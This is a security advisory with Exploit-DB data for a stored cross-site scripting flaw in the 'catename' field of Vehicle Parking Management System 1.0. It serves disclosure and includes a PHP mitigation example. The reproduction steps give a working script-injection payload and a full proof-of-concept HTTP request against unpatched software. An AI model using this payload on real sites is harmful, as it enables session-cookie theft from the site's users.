Vendor: Vehicle Parking Management System
By: Tushar Vaidya
CVSS: 8.8 (HIGH)
Vulnerability: Persistent Cross-Site Scripting (XSS)
CWE: 79
Product Name: Vehicle Parking Management System
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE: N/A
CPE: a:sourcecodester:vehicle_parking_management_system:1.0
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Ubuntu
2021

Vehicle Parking Management System 1.0 – ‘catename’ Persistent Cross-Site Scripting (XSS)

A persistent (stored) cross-site scripting (XSS) vulnerability exists in Vehicle Parking Management System 1.0. The 'catename' parameter of the 'addcategory.php' page is stored without validation and later rendered without output encoding, so an attacker who can submit the category form (an authenticated admin session, per the steps below) can inject JavaScript by sending a specially crafted HTTP request with a malicious payload. The stored payload executes in the browser of any user who views the affected page, for example the 'View Categories' listing.

Mitigation:

The application should validate the 'catename' input on the server side and HTML-encode the stored value wherever it is rendered, to prevent XSS attacks.
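As an added illustration of that mitigation (example code, not the project's own addcategory.php; the function names, the `category` table and the `$pdo` handle are assumptions), the snippet below rejects a category name that fails a server-side allowlist and HTML-encodes the stored value when it is rendered in the category listing:

```php
<?php
// Added example (not the project's code): input validation and output
// encoding for the 'catename' parameter described in the advisory.
// Function names, the 'category' table and the $pdo handle are assumptions.

// Server-side allowlist: letters, digits, spaces and a few punctuation
// marks, 1-50 characters. Quotes, angle brackets and parentheses are
// not allowed, so the advisory's payload is rejected before storage.
function validate_catename(string $raw): ?string {
    $name = trim($raw);
    if ($name === '' || mb_strlen($name) > 50) {
        return null;
    }
    if (!preg_match('/^[\p{L}\p{N} ._-]+$/u', $name)) {
        return null;
    }
    return $name;
}

// Output encoding: encode on every render, even for values that passed
// validation when stored (defence in depth against older rows).
function h(string $value): string {
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Handling the POST from addcategory.php with a prepared statement.
function add_category(PDO $pdo, array $post): bool {
    $name = validate_catename($post['catename'] ?? '');
    if ($name === null) {
        return false; // rejected, nothing is written
    }
    $stmt = $pdo->prepare('INSERT INTO category (catename) VALUES (?)');
    return $stmt->execute([$name]);
}

// Rendering one row of the "View Categories" table.
function render_category_row(array $row): string {
    return '<tr><td>' . h($row['catename']) . '</td></tr>';
}

// Demonstration with the advisory's payload (constructed input, no DB needed).
$payload = 'ba1man"><script>alert(document.cookie)</script>';
var_dump(validate_catename($payload));          // rejected on input
echo render_category_row(['catename' => $payload]), PHP_EOL; // encoded on output
```

Running the file shows the payload rejected by the allowlist and, if such a row already existed in the database, rendered as inert text rather than as a script element.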

Exploit-DB raw data:

# Exploit Title: Vehicle Parking Management System 1.0 - 'catename' Persistent Cross-Site Scripting (XSS)
# Date: 2021-02-25
# Exploit Author: Tushar Vaidya
# Vendor Homepage: https://www.sourcecodester.com/php/14415/vehicle-parking-management-system-project-phpmysql-full-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/mayuri_k/lagos-parker-fullsource-code.zip
# Version: v1.0
# Tested on: Ubuntu


Steps to Reproduce:
1) Log in with admin credentials and click on the 'Manage category' button.
2) Click on the 'Add Categories' button.
3) Now add 'Ba1man' in the input field of 'Category' and intercept it with Burp Suite.
4) Now add the following payload in the input field of 'Category' (the parameter name is 'catename'):

Payload:  ba1man"><script>alert(document.cookie)</script>

5) Click on Save.
6) Now go to 'Manage category > View Categories'.
7) The XSS payload is triggered.

Proof-of-concept:
1) Request:

POST /lagos_parker/parker/addcategory.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/lagos_parker/parker/addcategory.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 82
Connection: close
Cookie: PHPSESSID=6432hpio6v07igni4akosvdbmn
Upgrade-Insecure-Requests: 1
catename=ba1man"><script>alert(document.cookie)</script>&submit=